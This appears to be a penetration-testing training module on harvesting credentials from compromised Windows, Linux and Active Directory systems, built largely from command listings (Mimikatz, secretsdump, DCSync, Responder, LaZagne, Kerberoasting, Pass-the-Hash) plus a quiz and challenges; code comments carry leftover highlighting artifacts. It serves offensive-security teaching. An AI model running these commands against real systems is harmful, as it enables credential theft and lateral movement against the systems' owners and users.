Credential Harvesting

intermediate35 minWriteup

Extracting credentials from compromised systems

Learning Objectives

  • Dump password hashes
  • Extract credentials from memory
  • Find stored passwords
  • Use credentials for lateral movement

Credentials are the keys to the kingdom. A single valid username and password can unlock dozens of systems, while a domain admin hash might give you control of an entire organization. Credential harvesting is the art of extracting these precious secrets from compromised systems.

Unlike

where you're guessing credentials, here you're extracting them from memory, files, and configurations. Much faster, much quieter, and often more effective.

Sensitive Data

Credential harvesting captures real passwords and hashes. Handle them responsibly: secure storage, limited retention, proper disclosure to the client. Never use captured credentials outside your engagement scope.

Credential Types

  • Plaintext Passwords: The holy grail, immediately usable
  • Password Hashes: Can be cracked or used for Pass-the-Hash
  • Kerberos Tickets: Used for Pass-the-Ticket attacks
  • SSH Keys: Private keys provide direct access
  • API Keys/Tokens: Access to services and APIs
  • Certificates: Can be used for authentication

Windows Memory Credentials

Mimikatz

The legendary credential extraction tool. Dumps passwords, hashes, tickets, and more from Windows memory.

powershell
1606070;"># Run Mimikatz
2mimikatz.exe
3 
4606070;"># Enable debug privileges
5privilege::debug
6 
7606070;"># Dump all credentials
8sekurlsa::logonpasswords
9 
10606070;"># Dump SAM database
11lsadump::sam
12 
13606070;"># Dump cached domain credentials
14lsadump::cache
15 
16606070;"># Dump NTDS.dit (domain controller)
17lsadump::dcsync /domain:corp.local /user:Administrator
18 
19606070;"># Export Kerberos tickets
20sekurlsa::tickets /export
21 
22606070;"># Pass-the-Hash
23sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:cmd.exe

From Meterpreter

bash
1606070;"># Load Mimikatz
2meterpreter > load kiwi
3 
4606070;"># Dump credentials
5meterpreter > creds_all
6meterpreter > creds_msv     606070;"># NTLM hashes
7meterpreter > creds_kerberos
8meterpreter > creds_wdigest
9 
10606070;"># Dump SAM
11meterpreter > hashdump
12 
13606070;"># Golden ticket
14meterpreter > golden_ticket_create

SeDebugPrivilege Required

Mimikatz needs SeDebugPrivilege to access LSASS memory. This usually requires local admin or SYSTEM. Some techniques work without it.

Windows File Credentials

powershell
1606070;"># SAM and SYSTEM (requires admin)
2reg save HKLM\SAM sam.save
3reg save HKLM\SYSTEM system.save
4606070;"># Extract offline with secretsdump.py
5 
6606070;"># NTDS.dit (domain controller)
7ntdsutil 606070;">#a5d6ff;">"ac i ntds" "ifm" "create full c:\temp" q q
8606070;"># Creates copy of AD database
9 
10606070;"># Credential Manager
11cmdkey /list
12dir C:\Users\*\AppData\Local\Microsoft\Credentials\
13 
14606070;"># Browser passwords
15606070;"># Chrome - encrypted, need DPAPI
16606070;"># Firefox - key4.db and logins.json
17 
18606070;"># Unattended install files
19type C:\Windows\Panther\Unattend.xml
20type C:\Windows\Panther\Unattended.xml
21type C:\Windows\system32\sysprep\sysprep.xml
22 
23606070;"># Group Policy Preferences (legacy)
24findstr /S /I cpassword \\domain\sysvol\*.xml

Extracting Offline

bash
1606070;"># Extract from SAM/SYSTEM backup
2secretsdump.py -sam sam.save -system system.save LOCAL
3 
4606070;"># Extract from NTDS.dit
5secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
6 
7606070;"># Remote extraction with credentials
8secretsdump.py domain/user:password@target
9secretsdump.py -hashes :NTLM_HASH domain/user@target

Linux Credentials

bash
1606070;"># Shadow file (requires root)
2cat /etc/shadow
3 
4606070;"># History files
5cat ~/.bash_history
6cat ~/.mysql_history
7cat ~/.psql_history
8strings ~/.bash_history | grep -i password
9 
10606070;"># SSH keys
11ls -la ~/.ssh/
12cat ~/.ssh/id_rsa
13cat ~/.ssh/id_ed25519
14find / -name 606070;">#a5d6ff;">"id_rsa" 2>/dev/null
15 
16606070;"># Memory dump
17606070;"># Create memory dump of process
18gcore -o /tmp/dump $(pgrep -f 606070;">#a5d6ff;">"process_name")
19strings /tmp/dump.* | grep -i password
20 
21606070;"># Web application configs
22cat /var/www/*/wp-config.php
23cat /var/www/*/.env
24grep -r 606070;">#a5d6ff;">"password" /var/www/ 2>/dev/null
25 
26606070;"># Database configs
27cat /etc/mysql/debian.cnf
28cat ~/.pgpass
29 
30606070;"># Git configs
31cat ~/.git-credentials
32cat ~/.gitconfig

Searching for Credentials

bash
1606070;"># Find files with passwords
2grep -r 606070;">#a5d6ff;">"password" /home/ 2>/dev/null
3grep -r 606070;">#a5d6ff;">"pass" /var/www/ 2>/dev/null
4grep -r 606070;">#a5d6ff;">"secret" /opt/ 2>/dev/null
5 
6606070;"># Find config files
7find / -name 606070;">#a5d6ff;">"*.conf" -exec grep -l "password" {} \; 2>/dev/null
8find / -name 606070;">#a5d6ff;">"*.config" -exec grep -l "password" {} \; 2>/dev/null
9 
10606070;"># Find private keys
11find / -name 606070;">#a5d6ff;">"*.pem" 2>/dev/null
12find / -name 606070;">#a5d6ff;">"*.key" 2>/dev/null
13find / -type f -exec grep -l 606070;">#a5d6ff;">"BEGIN RSA PRIVATE KEY" {} \; 2>/dev/null

Network Credential Capture

bash
1606070;"># Responder - capture NTLM hashes
2sudo responder -I eth0 -rdwv
3 
4606070;"># Captured hashes saved to logs directory
5606070;"># Crack with hashcat -m 5600 (NTLMv2)
6 
7606070;"># Capture with tcpdump
8sudo tcpdump -i eth0 -w capture.pcap port 21 or port 23 or port 110
9 
10606070;"># Extract credentials from pcap
11606070;"># FTP, Telnet, HTTP Basic Auth are cleartext
12 
13606070;"># SMB relay (if signing disabled)
14sudo ntlmrelayx.py -tf targets.txt -smb2support

Responder is Powerful

Responder poisons LLMNR/NBT-NS and captures Net-NTLM hashes from network traffic. Run it and wait - credentials will come to you as systems try to resolve names.

Browser Credentials

bash
1606070;"># Firefox - passwords stored in logins.json
2606070;"># Decrypt with key4.db
3firefox_decrypt.py
4 
5606070;"># Chrome - encrypted with DPAPI
6606070;"># Need user's Windows password or DPAPI key
7606070;"># Tools: SharpChrome, LaZagne
8 
9606070;"># LaZagne - multi-browser
10python laZagne.py browsers
11 
12606070;"># All credentials with LaZagne
13python laZagne.py all

SharpChrome Example

powershell
1606070;"># Dump Chrome passwords (requires current user context)
2.\SharpChrome.exe logins
3 
4606070;"># Dump Chrome cookies
5.\SharpChrome.exe cookies

Domain Credential Harvesting

bash
1606070;"># DCSync attack (requires replication rights)
2secretsdump.py domain/admin:password@dc_ip
3 
4606070;"># Or from mimikatz
5lsadump::dcsync /domain:corp.local /all /csv
6 
7606070;"># Kerberoasting - extract service ticket hashes
8GetUserSPNs.py domain/user:password -dc-ip DC_IP -request
9 
10606070;"># Crack with hashcat
11hashcat -m 13100 kerberoast.txt wordlist.txt
12 
13606070;"># AS-REP Roasting (no pre-auth users)
14GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP
15 
16606070;"># Crack with hashcat
17hashcat -m 18200 asrep.txt wordlist.txt

Credential Harvesting Methodology

Systematic Credential Harvesting

1
Memory DumpMimikatz, hashdump for in-memory creds
2
File SearchConfig files, history, keys
3
RegistrySAM, cached credentials, LSA secrets
4
BrowsersSaved passwords, cookies
5
NetworkResponder for hash capture
6
DomainDCSync, Kerberoasting if applicable
7
Test ReuseTry captured creds on other systems

Knowledge Check

Quick Quiz
Question 1 of 3

What Windows privilege is required for Mimikatz to dump credentials?

Challenges

Windows Cred Dump

Challenge
🔥 intermediate

From a Windows system with local admin, extract: local user hashes, cached domain credentials, and any stored browser passwords.

Need a hint? (4 available)

Linux Credential Hunt

Challenge
🌱 beginner

As root on a Linux server, find all credentials: user hashes, SSH keys, and any passwords in config files.

Need a hint? (4 available)

Key Takeaways

  • Mimikatz is essential for Windows credential extraction
  • Credentials exist in memory, files, registry, and network traffic
  • NTLM hashes can be used directly (Pass-the-Hash) without cracking
  • Responder passively captures credentials from network traffic
  • DCSync extracts all domain credentials with replication rights
  • Always check for credential reuse across systems
  • Handle harvested credentials securely and responsibly